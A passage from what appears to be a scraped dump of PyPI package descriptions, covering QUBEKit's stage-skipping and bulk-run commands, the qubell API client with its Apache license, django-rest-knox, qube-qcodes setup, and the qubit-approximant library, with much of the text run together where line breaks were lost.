execution:-skip.\nThe skip command allows you to skip any number ofproceedingsteps.\nThis is useful if using a method not covered by QUBEKit for a particular stage,\nor if you're just not interested in certain time-consuming results.-skiptakes at least one argument and on use will completely skip over the provided stage(s).\nSay you are not interested in calculating bonds and angles, and simply want the charges; the command:QUBEKit -i acetone.pdb -skip hessian mod_semwill skip over the Hessian matrix calculation which is necessary for the modified Seminario method (skipping that too).\nQUBEKit will then go on to calculate density, charges and so on.Beware skipping steps which are required for other stages of the analysis.Just like the other commands,-skipcan be used in conjunction with other commands like config changing,\nand-endor-restart. 
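In terms of the conceptual sketch from the previous section, skipping simply removes the named stages from the selected slice while leaving the order of the rest untouched. Again, this is an illustration for this document rather than QUBEKit's internal code, and it reuses the STAGES list and stages_to_run() helper defined above.

# Builds on the STAGES list and stages_to_run() sketch above.
# Skipped stages are dropped from the selected slice; everything else
# keeps its original order.
def stages_to_run_with_skip(restart="parametrise", end="finalise", skip=()):
    return [s for s in stages_to_run(restart, end) if s not in set(skip)]

print(stages_to_run_with_skip(end="charges", skip=("hessian", "mod_sem")))
# ['parametrise', 'mm_optimise', 'qm_optimise', 'density', 'charges']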
Using the same example above, you can stop having calculated charges:QUBEKit -i acetone.pdb -skip hessian mod_sem -end charges-skipis not available for-bulkcommands and probably never will be.\nThis is to keep bulk commands reasonably simple.\nWe recommend creating a simple script to run single analysis commands if you would like to skip stages frequently.In case you want to add external files to be used by QUBEKit, empty folders are created in the correct place even when skipped.\nThis makes it easy to drop in, say, a .cube file from another charges engine,\nthen calculate the Lennard-Jones parameters with QUBEKit.QUBEKit Commands: Custom Start and End Points (multiple molecules)When using custom start and/or end points with bulk commands, the stages are written to the csv file, rather than the terminal.\nIf no start point is specified, a new working directory and log file will be created.\nOtherwise, QUBEKit will find the correct directory and log file based on the log string and molecule name.\nThis means thelog string cannot be changed when restarting a bulk run.\nThere will however be a clear marker in the log file, indicating when an analysis was restarted.Using a similar example as above, two molecules are analysed with DDEC6, then restarted for analysis with DDEC3:first_run.csv:\n name,charge,multiplicity,config,smiles,torsion_order,restart,end\n ethane,,,ddec6_config,,,,charges\n benzene,,,ddec6_config,,,,charges\n\nQUBEKit -bulk first_run.csv\n\n(optional: copy the folders produced to a different location to store results)\n\n\nsecond_run.csv:\n name,charge,multiplicity,config,smiles,torsion_order,restart,end\n ethane,,,ddec3_config,,,density,charges\n benzene,,,ddec3_config,,,density,charges\n\nQUBEKit -bulk second_run.csvThe first execution uses a config file for DDEC6 and runs from the beginning up to the charges stage.\nThe second execution uses a config file for DDEC3 and runs from the density stage to the charges stage.QUBEKit Commands: Checking ProgressThroughout an analysis, key information will be added to the log file.\nThis information can be quickly parsed by QUBEKit's-progresscommandTo display the progress of all analyses in your current directory and below, use the command:QUBEKit -progressQUBEKit will find the log files in all QUBEKit directories and display a colour-coded table of the progress.Tick marks indicate a stage has completed successfullyTildes indicate a stage has not finished nor erroredAn S indicates a stage has been skippedAn E indicates that a stage has started and failed for some reason.\nViewing the log file will give more information as towhyit failed.QUBEKit Commands: Other Commands and InformationYou cannot run multiple kinds of analysis at once. For example:QUBEKit -bulk example.csv -i methane.pdb -bonds g09is not a valid command. These should be performed separately:QUBEKit -bulk example.csv\nQUBEKit -i methane.pdb -bonds g09Be wary of running QUBEKit concurrently through different terminal windows.\nThe programs QUBEKit calls often just try to use however much memory is assigned in the config files;\nthis means they may try to take more than is available, leading to a crash.Cook BookComplete analysis of single molecule from its pdb file using only defaults:QUBEKit -i molecule.pdbAll commands can be viewed by callingQUBEKit -h. 
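If you end up repeating the same recipes, the simple script mentioned earlier can be as small as a loop over subprocess calls. The sketch below is just one possible way to do it: the molecule files, log labels and flag values are made-up placeholders, and only flags that appear in this document are used. The jobs run one after another on purpose, because of the warning above about running QUBEKit concurrently and memory allocation.

# run_recipes.py -- rough sketch of driving repeated single-molecule runs.
# The molecule files, log labels and flag values below are placeholders;
# only flags shown elsewhere in this document are used.
import subprocess

JOBS = [
    {"input": "methane.pdb", "log": "METH001", "extra": ["-ddec", "6"]},
    {"input": "ethane.pdb", "log": "ETH001", "extra": ["-solvent", "false"]},
]

for job in JOBS:
    cmd = ["QUBEKit", "-i", job["input"], "-log", job["log"]] + job["extra"]
    print("Running:", " ".join(cmd))
    subprocess.run(cmd, check=True)  # sequential on purpose -- see the memory note above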
Below is an explanation of what all these commands are:Enable or disable GeomeTRIC (bool):-geo trueor-geo falseChange DDEC version (int; 3 or 6):-ddec 3or-ddec 6Enable or disable the solvent model (bool):-solvent trueor-solvent falseChange the method for initial parametrisation (str; openff, xml or antechamber):-param openff,-param xml,-param antechamberChange the log file name and directory label (str; any):-log Example123Change the functional being used (str; any valid psi4/g09 functional):-func B3LYPChange the basis set (str; any valid psi4/g09 basis set):-basis 6-31GChange the vibrational scaling used with the basis set (float; e.g. 0.997):-vib 0.967Change the amount of memory allocated (int; do not exceed computer's limits!):-memory 4Change the number of threads allocated (int; do not exceed computer's limits!):-threads 4Complete analysis of ethane from its smiles string using DDEC3, OpenFF and no solvent (-logcommand labels the analysis):QUBEKit -sm CC -ddec 3 -param openff -solvent false -log ethane_exampleAnalyse benzene from its pdb file until the charges are calculated; use DDEC3:QUBEKit -i benzene.pdb -end charges -ddec 3 -log BENZ_DDEC3Redo that analysis but use DDEC6 instead:(Optional) Copy the folder and change the name to indicate it's for DDEC6:cp -r QUBEKit_benzene_2019_01_01_BENZ_DDEC3 QUBEKit_benzene_2019_01_01_BENZ_DDEC6(Optional) Move into the new folder:cd QUBEKit_benzene_2019_01_01_BENZ_DDEC6Rerun the analysis with the DDEC version changed.\nThis time we can restart just before the charges are calculated to save time.\nHere we're restarting from density and finishing on charges:QUBEKit -restart density -end charges -ddec 6This will still produce an xml in thefinalisefolder.Analyse methanol from its smiles string both with and without a solvent:QUBEKit -sm CO -solvent true -log Methanol_Solvent(Optional) Create and move into new foldercp -r QUBEKit_methanol_2019_01_01_Methanol_Solvent QUBEKit_methanol_2019_01_01_Methanol_No_Solvent\ncd QUBEKit_methanol_2019_01_01_Methanol_No_Solvent\n\nQUBEKit -solvent false -restart densityCalculate the density for methane, ethane and propane using their pdbs:Generate a blank csv file with a relevant name:QUBEKit -csv density.csvFill in each row like so:density.csv:\n name,charge,multiplicity,config,smiles,torsion_order,restart,end\n methane,,,master_config.ini,,,,density\n ethane,,,master_config.ini,,,,density\n propane,,,master_config.ini,,,,densityRun the analysis:QUBEKit -bulk density.csvNote, you can add more commands to the execution but it is recommended that changes are made to the config files instead.Running the same analysis but using the smiles strings instead; this time do a complete analysis:Generate a blank csv with the namesimple_alkanes:QUBEKit -csv simple_alkanes.csvFill in the csv file like so:simple_alkanes.csv:\n name,charge,multiplicity,config,smiles,torsion_order,restart,end\n methane,,,master_config.ini,C,,,\n ethane,,,master_config.ini,CC,,,\n propane,,,master_config.ini,CCC,,,Run the analysis:QUBEKit -bulk simple_alkanes.csvJust calculating charges for acetone:Skip hessian and mod_sem, the two stages used to calculate the bonds and angles,\nthen end the analysis after the charge calculation.QUBEKit -i acetone.pdb -skip hessian mod_sem -end charges"} +{"package": "qubell-api-python-client", "pacakge-description": "Version 2.0, January 2004http://www.apache.org/licenses/TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION1. 
Definitions.\"License\" shall mean the terms and conditions for use, reproduction, anddistribution as defined by Sections 1 through 9 of this document.\"Licensor\" shall mean the copyright owner or entity authorized by the copyrightowner that is granting the License.\"Legal Entity\" shall mean the union of the acting entity and all other entitiesthat control, are controlled by, or are under common control with that entity.For the purposes of this definition, \"control\" means (i) the power, direct orindirect, to cause the direction or management of such entity, whether bycontract or otherwise, or (ii) ownership of fifty percent (50%) or more of theoutstanding shares, or (iii) beneficial ownership of such entity.\"You\" (or \"Your\") shall mean an individual or Legal Entity exercisingpermissions granted by this License.\"Source\" form shall mean the preferred form for making modifications, includingbut not limited to software source code, documentation source, and configurationfiles.\"Object\" form shall mean any form resulting from mechanical transformation ortranslation of a Source form, including but not limited to compiled object code,generated documentation, and conversions to other media types.\"Work\" shall mean the work of authorship, whether in Source or Object form, madeavailable under the License, as indicated by a copyright notice that is includedin or attached to the work (an example is provided in the Appendix below).\"Derivative Works\" shall mean any work, whether in Source or Object form, thatis based on (or derived from) the Work and for which the editorial revisions,annotations, elaborations, or other modifications represent, as a whole, anoriginal work of authorship. For the purposes of this License, Derivative Worksshall not include works that remain separable from, or merely link (or bind byname) to the interfaces of, the Work and Derivative Works thereof.\"Contribution\" shall mean any work of authorship, including the original versionof the Work and any modifications or additions to that Work or Derivative Worksthereof, that is intentionally submitted to Licensor for inclusion in the Workby the copyright owner or by an individual or Legal Entity authorized to submiton behalf of the copyright owner. For the purposes of this definition,\"submitted\" means any form of electronic, verbal, or written communication sentto the Licensor or its representatives, including but not limited tocommunication on electronic mailing lists, source code control systems, andissue tracking systems that are managed by, or on behalf of, the Licensor forthe purpose of discussing and improving the Work, but excluding communicationthat is conspicuously marked or otherwise designated in writing by the copyrightowner as \"Not a Contribution.\"\"Contributor\" shall mean Licensor and any individual or Legal Entity on behalfof whom a Contribution has been received by Licensor and subsequentlyincorporated within the Work.2. Grant of Copyright License.Subject to the terms and conditions of this License, each Contributor herebygrants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free,irrevocable copyright license to reproduce, prepare Derivative Works of,publicly display, publicly perform, sublicense, and distribute the Work and suchDerivative Works in Source or Object form.3. 
Grant of Patent License.Subject to the terms and conditions of this License, each Contributor herebygrants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free,irrevocable (except as stated in this section) patent license to make, havemade, use, offer to sell, sell, import, and otherwise transfer the Work, wheresuch license applies only to those patent claims licensable by such Contributorthat are necessarily infringed by their Contribution(s) alone or by combinationof their Contribution(s) with the Work to which such Contribution(s) wassubmitted. If You institute patent litigation against any entity (including across-claim or counterclaim in a lawsuit) alleging that the Work or aContribution incorporated within the Work constitutes direct or contributorypatent infringement, then any patent licenses granted to You under this Licensefor that Work shall terminate as of the date such litigation is filed.4. Redistribution.You may reproduce and distribute copies of the Work or Derivative Works thereofin any medium, with or without modifications, and in Source or Object form,provided that You meet the following conditions:You must give any other recipients of the Work or Derivative Works a copy ofthis License; andYou must cause any modified files to carry prominent notices stating that Youchanged the files; andYou must retain, in the Source form of any Derivative Works that You distribute,all copyright, patent, trademark, and attribution notices from the Source formof the Work, excluding those notices that do not pertain to any part of theDerivative Works; andIf the Work includes a \"NOTICE\" text file as part of its distribution, then anyDerivative Works that You distribute must include a readable copy of theattribution notices contained within such NOTICE file, excluding those noticesthat do not pertain to any part of the Derivative Works, in at least one of thefollowing places: within a NOTICE text file distributed as part of theDerivative Works; within the Source form or documentation, if provided alongwith the Derivative Works; or, within a display generated by the DerivativeWorks, if and wherever such third-party notices normally appear. The contents ofthe NOTICE file are for informational purposes only and do not modify theLicense. You may add Your own attribution notices within Derivative Works thatYou distribute, alongside or as an addendum to the NOTICE text from the Work,provided that such additional attribution notices cannot be construed asmodifying the License.You may add Your own copyright statement to Your modifications and may provideadditional or different license terms and conditions for use, reproduction, ordistribution of Your modifications, or for any such Derivative Works as a whole,provided Your use, reproduction, and distribution of the Work otherwise complieswith the conditions stated in this License.5. Submission of Contributions.Unless You explicitly state otherwise, any Contribution intentionally submittedfor inclusion in the Work by You to the Licensor shall be under the terms andconditions of this License, without any additional terms or conditions.Notwithstanding the above, nothing herein shall supersede or modify the terms ofany separate license agreement you may have executed with Licensor regardingsuch Contributions.6. 
Trademarks.This License does not grant permission to use the trade names, trademarks,service marks, or product names of the Licensor, except as required forreasonable and customary use in describing the origin of the Work andreproducing the content of the NOTICE file.7. Disclaimer of Warranty.Unless required by applicable law or agreed to in writing, Licensor provides theWork (and each Contributor provides its Contributions) on an \"AS IS\" BASIS,WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied,including, without limitation, any warranties or conditions of TITLE,NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You aresolely responsible for determining the appropriateness of using orredistributing the Work and assume any risks associated with Your exercise ofpermissions under this License.8. Limitation of Liability.In no event and under no legal theory, whether in tort (including negligence),contract, or otherwise, unless required by applicable law (such as deliberateand grossly negligent acts) or agreed to in writing, shall any Contributor beliable to You for damages, including any direct, indirect, special, incidental,or consequential damages of any character arising as a result of this License orout of the use or inability to use the Work (including but not limited todamages for loss of goodwill, work stoppage, computer failure or malfunction, orany and all other commercial damages or losses), even if such Contributor hasbeen advised of the possibility of such damages.9. Accepting Warranty or Additional Liability.While redistributing the Work or Derivative Works thereof, You may choose tooffer, and charge a fee for, acceptance of support, warranty, indemnity, orother liability obligations and/or rights consistent with this License. However,in accepting such obligations, You may act only on Your own behalf and on Yoursole responsibility, not on behalf of any other Contributor, and only if Youagree to indemnify, defend, and hold each Contributor harmless for any liabilityincurred by, or claims asserted against, such Contributor by reason of youraccepting any such warranty or additional liability.END OF TERMS AND CONDITIONSAPPENDIX: How to apply the Apache License to your workTo apply the Apache License to your work, attach the following boilerplatenotice, with the fields enclosed by brackets \"[]\" replaced with your ownidentifying information. (Don't include the brackets!) The text should beenclosed in the appropriate comment syntax for the file format. 
We alsorecommend that a file or class name and description of purpose be included onthe same \"printed page\" as the copyright notice for easier identification withinthird-party archives.Copyright [yyyy] [name of copyright owner]Licensed under the Apache License, Version 2.0 (the \"License\");you may not use this file except in compliance with the License.You may obtain a copy of the License athttp://www.apache.org/licenses/LICENSE-2.0Unless required by applicable law or agreed to in writing, softwaredistributed under the License is distributed on an \"AS IS\" BASIS,WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.See the License for the specific language governing permissions andlimitations under the License.Description: python-qubell-client====================Installation============pip install qubell-api-python-clientConfiguration=============To configure tests, set up environment variables:QUBELL_USER, QUBELL_PASSWORD - user to access qubellQUBELL_TENANT - url to qubell platform (https://express.qubell.com)QUBELL_ORGANIZATION - name of organization to use. Will be created if not exists.If you attend to create environment, you will also need:PROVIDER_TYPE, PROVIDER_REGION, PROVIDER_IDENTITY, PROVIDER_CREDENTIAL - credentials for amazon ec2. (to create provider)By default Amazon ec2 used (in us-east zone)Example:export QUBELL_TENANT=\"https://express.qubell.com\"export QUBELL_USER=\"user@gmail.com\"export QUBELL_PASSWORD=\"password\"export QUBELL_ORGANIZATION=\"my-org\"# Additional parametersexport PROVIDER_TYPE=\"aws-ec2\"export PROVIDER_REGION=\"us-east-1\"export PROVIDER_IDENTITY=\"FFFFFFFFF\"export PROVIDER_CREDENTIAL=\"FFFFFFFFFF\"CLI Tool========Many operations are available direcly through CLI interface, like creating orgs,initializing cloud accounts, and importing/exporting applications.$ nomiUsage: nomi [OPTIONS] COMMAND [ARGS]...CLI for tonomi.com using contrib-python-qubell-clientTo enable completion:eval \"$(_NOMI_COMPLETE=source nomi)\"Options:--tenant TEXT Tenant url to use, QUBELL_TENANT by default--user TEXT User to use, QUBELL_USER by default--password TEXT Password to use, QUBELL_PASSWORD by default--organization TEXT Organization to use, QUBELL_ORGANIZATION by default--debug Debug mode, also QUBELL_LOG_LEVEL can be used.--help Show this message and exit.Commands:instanceapplicationenvironmentorganizationplatformzonemanifestCommands are documented via help:$ nomi instance --helpUsage: nomi instance [OPTIONS] COMMAND [ARGS]......Features:instancedescribe Show details about instancedestroy Destroy instancelaunch Launch instance in applicationlist List instances in current organization or applicationlogs Get activity logsparameters Get default launch parameters for applicationremove Force remove instancewait-status Wait until instance status becomes 'Status' or timeout reachedapplicationdelete Delete applicationexport Save manifest of applications to filesimport Upload manifest to application.list List applications in organizationenvironmentclear Clean environment.clone Copy environmentcreate Create environmentdelete Delete environmentdescribe Show services, markers and properties of environmentexport Save environment to fileget-keypair Download keypairimport Import environment from fileinit Add basic services to environment (WF, CA, KS services)list List environmentsmake-defaultorganizationcreate Create organizationimport-kit Import starter kitinit Initialize cloud account servicelist List organizationsrestore Restore configuration from ENV 
fileplatformshow-account Exports current account configuration inshell-friendly form. Takes intoaccount explicit top-level flags like --organizationzonelist List available zonesmanifestvalidate Validate manifestRunning tests=============Run single test:nosetests -s -v stories.instance.test_actions:BasicInstanceActionsTest.test_workflow_launchRun all tests in folder:nosetests -s -v testsorcd testsnosetestsUsing client============Building sandboxes------------------Sandboxes in qubell platform could be created on different levels. Maximum isolated sandbox could be achieved by separate organization (with it's own environments, users and application).Simple way to create sandbox (see ./contrib-python-qubell-client/sandbox/):Create file containing organization structure, for example:organizations:- name: DEFAULT_ORGapplications:- name: super_parentfile: ./super_parent.yml- name: middle_childfile: ./middle_child.yml- name: childfile: ./child.ymlenvironments:- name: defaultservices:- name: Default credentials service- name: Default workflow service- name: child-serviceservices:- name: Default workflow servicetype: builtin:workflow_service- name: Default credentials servicetype: builtin:cobalt_secure_store- name: child-serviceapplication: childinstances:- name: test-instanceapplication: super_parentNow you can create organization, running:./restore_env.py default.envAfter, you will have fully configured organization, even with running instances. This example shows how to describe 3-level hearchical application, where child instance launched as service.Coding your own scripts-----------------------First way of creating sandbox, using restore method:config = {'organizations': [{'name': 'DEFAULT_ORG','applications': [{'file': './super_parent.yml','name': 'super_parent'},{'file': './middle_child.yml','name': 'middle_child'},{'file': './child.yml','name': 'child'}],'environments': [{'name': 'default','services': [{'name': 'Default credentials service'},{'name': 'Default workflow service'},{'name': 'child-service'}]}],'instances': [{'application': 'super_parent','name': 'test-instance'}],'providers': [{'ec2SecurityGroup': 'default','jcloudsCredential': 'AAAAAAAAA','jcloudsIdentity': 'BBBBBBBBBBB','jcloudsRegions': 'us-east-1','name': 'generated-provider-for-tests','provider': 'aws-ec2','providerCopy': 'aws-ec2'}],'services': [{'name': 'Default workflow service','type': 'builtin:workflow_service'},{'name': 'Default credentials service','type': 'builtin:cobalt_secure_store'},{'application': 'child','name': 'child-service'}]}]}from qubell.api.private.platform import QubellPlatformfrom qubell.api.globals import QUBELLplatform = QubellPlatform.connect(user=QUBELL['user'], password=QUBELL['password'], tenant=QUBELL['tenant'])platform.restore(config)# Let's check what we've gotprint platform.organizations['DEFAULT_ORG'].namefor ins in platform.organizations['DEFAULT_ORG'].instances:print ins.nameSecond way, using get/create methods:from qubell.api.private.platform import QubellPlatformfrom qubell.api.private.manifest import Manifestfrom qubell.api.globals import QUBELL, PROVIDER_CONFIG, DEFAULT_WORKFLOW_SERVICE, DEFAULT_CREDENTIAL_SERVICE, DEFAULT_CLOUD_ACCOUNT_SERVICEfrom qubell.api.private.service import CLOUD_ACCOUNT_TYPE, WORKFLOW_SERVICE_TYPE, COBALT_SECURE_STORE_TYPE# Connect to platformplatform = QubellPlatform.connect(user=QUBELL['user'], password=QUBELL['password'], tenant=QUBELL['tenant'])##### Organizationorg = platform.organization(name='DEFAULT_ORG')# After executing this code, organization 
\"DEFAULT_ORG\" would be created (if not exists) or initialized (if exists)##### Environment# Usually environment consists of cloud account, keystore service and workflow service. So, we need to add these services to our organization, then add them to our environment:def prepare_env(org):# Add services to organizationkey_service = org.service(type=COBALT_SECURE_STORE_TYPE, name=DEFAULT_CREDENTIAL_SERVICE())wf_service = org.service(type=WORKFLOW_SERVICE_TYPE, name=DEFAULT_WORKFLOW_SERVICE())cloud_account = org.service(type=CLOUD_ACCOUNT_TYPE, name=DEFAULT_CLOUD_ACCOUNT_SERVICE(), parameters=PROVIDER_CONFIG)# Add services to environmentenv = org.environment(name='new-environment')env.clean()env.add_service(key_service)env.add_service(wf_service)env.add_service(cloud_account)# Here we regenerate keypairenv.add_policy({\"action\": \"provisionVms\",\"parameter\": \"publicKeyId\",\"value\": key_service.regenerate()['id']})return envenvironment = prepare_env(org)# Now, platform ready to be used. We need only application with valid manifest.##### Application# We need manifest to create application::manifest = Manifest(url='https://raw.githubusercontent.com/qubell/contrib-python-qubell-client/master/sandbox/child.yml')# Creating applicationapp = org.application(manifest=manifest, name='first_app')# Application will be created.# Let's start instance using in env1 :instance = org.create_instance(application=app, environment=environment)# This way we wait instance to came up in 15 minutes or break.assert instance.ready(15)print instance.return_values['child_out.child_output']Platform: UNKNOWN"} +{"package": "qube-money-knox", "pacakge-description": "django-rest-knoxAuthentication Module for django rest authKnox provides easy to use authentication forDjango REST\nFrameworkThe aim is to allow\nfor common patterns in applications that are REST based, with little\nextra effort; and to ensure that connections remain secure.Knox authentication is token based, similar to theTokenAuthenticationbuilt in to DRF. However, it overcomes some problems present in the\ndefault implementation:DRF tokens are limited to one per user. This does not facilitate\nsecurely signing in from multiple devices, as the token is shared.\nIt also requiresalldevices to be logged out if a server-side\nlogout is required (i.e. the token is deleted).Knox provides one token per call to the login view - allowing each\nclient to have its own token which is deleted on the server side\nwhen the client logs out.Knox also provides an option for a logged in client to removealltokens that the server has - forcing all clients to re-authenticate.DRF tokens are stored unencrypted in the database. This would allow\nan attacker unrestricted access to an account with a token if the\ndatabase were compromised.Knox tokens are only stored in a secure hash form (like a password). Even if the\ndatabase were somehow stolen, an attacker would not be able to log\nin with the stolen credentials.DRF tokens track their creation time, but have no inbuilt mechanism\nfor tokens expiring. 
Knox tokens can have an expiry configured in\nthe app settings (default is 10 hours.)More information can be found in theDocumentationRun the tests locallyIf you need to debug a test locally and if you havedockerinstalled:simply run the./docker-run-tests.shscript and it will run the test suite in every Python /\nDjango versions.You could also simply run regulartoxin the root folder as well, but that would make testing the matrix of\nPython / Django versions a bit more tricky.Work on the documentationOur documentation is generated byMkdocs.You can refer to their documentation on how to install it locally.Another option is to usemkdocs.shin this repository.\nIt will run mkdocs in adockercontainer.Running the script without any params triggers theservecommand.\nThe server is exposed on localhost on port 8000.To configure the port theservecommand will be exposing the server to, you\ncan use the following env var:MKDOCS_DEV_PORT=\"8080\"You can also pass anymkdocscommand like this:./mkdocs build\n./mkdocs --helpCheck theMkdocs documentationfor more."} +{"package": "qube-qcodes", "pacakge-description": "qubeUseful tools for experiments performed by the group of Dr. Christopher Bauerle (CNRS Neel Institute, Grenoble).\nExamples can be found in the \"examples\" folder.How to install QCoDeS?Open your Anaconda/Miniconda prompt and install qcodes:condacreate-nqcodespython=3.9\ncondaactivateqcodes\npipinstallqcodesOpen your Anaconda/Miniconda prompt and install additional packages:activateqcodes\npipinstallpython-gdsii\npipinstallstyle\ncondainstall-cconda-forgescipy\ncondainstall-cconda-forgegdspy\ncondainstall-cconda-forgejupyterlab\ncondainstall-cconda-forgeipympl\ncondainstall-cconda-forgenidaqmx-python\npipinstallnifpgaHow to install qube?Easy installation:activateqcodes\npipinstallqube-qcodesDynamical installationDownload qube package from GitHubOpen your Anaconda/Miniconda prompt:pip install -e PACKAGE_FOLDER\\qube-qcodesIf you change anything in the qube project folder, it will be applied toimport qubeHow to start an experiment with QCoDeS?COPY the \"YYYYMMDD__experiment__sample\" folder into \"E:/your_name/\" and rename it the following way:YYYYMMDD ... starting date of the experiment\nexperiment ... name of your experiment -- for instance \"ABL\" for Aharanov-Bohm oscillations with Levitons\nsample ... name of your sample -- for instance \"v0_b3\" for first version of design and 2nd column (B) and 3rd row (3) of your chipNote: For automatic recognition, is important to keep TWO subsequent underscores \"__\" between the keywords of the folder name.The folder has the following content:./configurations/\nThis folder holds Jupyter Notebooks to setup different configurations of your experiment.\nAs a starting point you can check the default configuration of your fridge -- for instance \"default_wodan.ipynb\".\nSetup your configurations accordingly with reasonable file names -- such as \"c0_lock_in.ipynb\", \"m1_pinch_off_dc.ipynb\", ... 
.\nA configuration notebook contains the instruments that are used on your experimental setup.\nIf you make a modification, always modify a copy of a previously used configuration../measurements/\nThis folder will contain the database for your experiment \"experiments.db\" with all the measurements.\nAdditionally, there should be all the code for the measurements that are executed during your experiment.\nThe measurement template \"tutorial.ipynb\" contains all the imports to perform sweeps and basic plotting operations.\nUse it for your measurements that should be always saved with reasonable names such as \"m0_lockin_test\", \"m1_pinch_off_at_4K\", ... ../notes/\nHere one should find only notes that are prepared in a presentable way.\nWe propose to use jupyter notebook with markdown language since it is flexible.\nYou can make your notes however in any format you like (OneNote, PowerPoint, ...)./tools/\nThis folder contains tools and instrument drivers that go beyond the standard qcodes functionality.\nFeel free to adapt them for your application and to add custom functions that you can use in your measurements.\nAfter implemententing a new feature that is working well, one can discuss an update of the driver in the template folder../QCoDeS - Jupyter Notebook\nWindows shortcut to open qcodes via Miniconda3 locally or on a network drive.SETUP your configuration file:MEASURE:ANALYSE:"} +{"package": "qubic", "pacakge-description": "Simulation and map-making tools for the QUBIC experiment."} +{"package": "qubic.sphinx.graphvizinclude", "pacakge-description": "Contentsqubic.sphinx.graphvizincludeOverviewInstallationRegistering the ExtensionUsing the Extensionchange historyqubic.sphinx.graphvizincludeOverviewThis package defines an extension for theSphinxdocumentation system. The extension\nallows generation of Graphviz from external .dot resourcesInstallationInstall viaeasy_install:$ bin/easy_install qubic.sphinx.graphvizincludeor any other means which gets the package on yourPYTHONPATH.Registering the ExtensionAddqubic.sphinx.graphvizincludeto theextensionslist in theconf.pyof the Sphinx documentation for your product. E.g.:extensions = ['sphinx.ext.autodoc',\n 'sphinx.ext.doctest',\n 'qubic.sphinx.graphvizinclude',\n ]Using the ExtensionAt appropriate points in your document, call out the interface\nautodocs via:.. graphvizinclude:: ./path_to/graph_definition.dotchange history0.1first release"} +{"package": "qubit", "pacakge-description": "No description available on PyPI."} +{"package": "qubitai-dltk", "pacakge-description": "AboutOur philosophy is to create a Deep Technologies platform with ethical AI for enterprises that offers meaningful insights and actions.DLTK Unified Deep Learning platform can be leveraged to build solutions that are Application-Specific and Industry-Specific where AI opportunity found by using DLTK SDKs, APIs and Microservices. 
With best of the breed AI Services from platform pioneers like H2O, Google's TensorFlow, WEKA and a few trusted open-sources models and libraries, we offer custom AI algorithms with co-innovation support.Getting StartedPre-requisiteOpenDLTK: OpenDLTK is collection of open-source docker images, where processing of images, text or structured tabular data is done using state-of-the-art AI models.Please follow the below link for instructions onOpenDLTK InstallationInstallationInstalling through pippipinstallqubitai-dltkInstalling from SourceClone the repogitclonehttps://github.com/dltk-ai/qubitai-dltk.gitSet working directory to qubitai-dltk foldercdqubitai-dltkInstall requirements from requirements.txt filepipinstall-rrequirements.txtUsageA detailed documentation is presenthere, on how to use various services supported by DLTK,\nto verify whether all setup are done properly, we will be using a sample NLP code to analyze sentiment of the input text.Exampleimportdltk_aiclient=dltk_ai.DltkAiClient(base_url='http://localhost:8000')text=\"The product is very easy to use and has got a really good life expectancy.\"sentiment_analysis_response=client.sentiment_analysis(text)print(sentiment_analysis_response)Important Parameters:APIkey: a valid API key generated by following steps as shownherebase_url: The base_url is the url for the machine where base service is installed. (default:http://localhost:8000)Expected Output{\"nltk_vader\":{\"emotion\":\"POSITIVE\",\"scores\":{\"negative\":0.0,\"neutral\":0.653,\"positive\":0.347,\"compound\":0.7496}}}ServicesMachine LearningML Scikit- This Microservice uses widely used Scikit package for training and evaluating classification, regression, clustering models and other ML related tasks on dataset provided by user.ML H2O- This Microservice uses H2O.ai python SDK for training and evaluating classification, regression, clustering models and other ML related tasks on dataset provided by user.ML Weka- This Microservice uses WEKA for training and evaluating classification, regression, clustering models and other ML related tasks on dataset provided by user.Example NotebooksML Classification Colab NotebookML Regrression Colab NotebookML Clustering Colab NotebookNatural Language Processing (NLP)This microservice provides features like Sentiment analysis, Name Entity Recognition, Tag Extraction using widely usedSpacyandNLTKpackage. 
It also provide support\nfor various AI engines like Azure & IBM.Example NotebookNLP Colab NotebookComputer VisionImage Classification- This microservice classify images into various classes using pretrained model and also using supported AI Engines.Object Detection- This microservice detect objects in Images provided by user using pretrained model and using supported AI Engines.Example NotebooksImage Classification Colab NotebookObject Detection Colab NotebookFace Analytics Colab NotebookNoteTo use third party AI engines like Microsoft Azure & IBM watson, please ensure that its credentials were configured while setting up openDLTK.DocumentationFor more detail on DLTK features & usage please referDLTK SDK Client DocumentationLicenseThe content of this project itself is licensed underGNU LGPL, Version 3 (LGPL-3)TeamFounding MemberMentorLead MaintainerCore ContributorFor more details you can reach us at QubitAI Email-ID -connect@qubitai.tech"} +{"package": "qubit-approximant", "pacakge-description": "QubitApproximantApythonpackage for approximating quantum circuits with a single qubit.Documentation and examplesDocumentation created withmkdocscan be found inhttps://pablovegan.github.io/QubitApproximant/.InstallationWithpip:pip install qubit-approximantQuick usageImporting a functionIn the submodule benchmarking.functions there are multiple test functions to choose fromimportnumpyasnpfromqubit_approximant.benchmarking.functionsimportgaussianx=np.linspace(-2.5,2.5,1000)fn_kwargs={'mean':0.0,'std':0.5,'coef':1}fn=gaussian(x,**fn_kwargs)Creating a circuitTo create a circuit just choose the ansaz (CircuitRxRyRz,CircuitRxRyorCircuitRy) and the encoding ('prob'or'amp').fromqubit_approximant.coreimportCircuitRxRyRzcircuit=CircuitRxRyRz(x,encoding='prob')Cost functionTo find the optimum parameters of the circuit, we need to choose a cost function. This can be done with theCostclass, where we input the function to approximate, the circuit ansatz and a metric to quantify the error in the approximation (options are'mse','rmse','mse_weighted','kl_divergence'or'log_cosh')fromqubit_approximant.coreimportCostcost=Cost(fn,circuit,metric='mse')OptimizerChoose an optimizer (BlackBoxOptimizer,GDOptimizerorAdamOptimizer)fromqubit_approximant.coreimportBlackBoxOptimizeroptimizer=BlackBoxOptimizer(method=\"L-BFGS-B\")and find the optimum parameters for the chosen circuitlayers=6init_params=np.random.default_rng().standard_normal(4*layers)opt_params=optimizer(cost,cost.grad,init_params)Multilayer optimizerWe may also optimize an ansatz for multiple layers using theLayerwiseOptimizer, which uses the optimum parameters for a circuit with $L$ layers as initial parameters for the optimization of a circuit with $L+1$ layers. A list with the optimum parameters for each layer is returned.fromqubit_approximant.coreimportLayerwiseOptimizerlayerwise_opt=LayerwiseOptimizer(optimizer,min_layer=3,max_layer=7,new_layer_coef=0.3,new_layer_position='random')params_list=layerwise_opt(cost,cost.grad,init_params)Note: aMultilayerOptimizerwhich doesn't reuse the 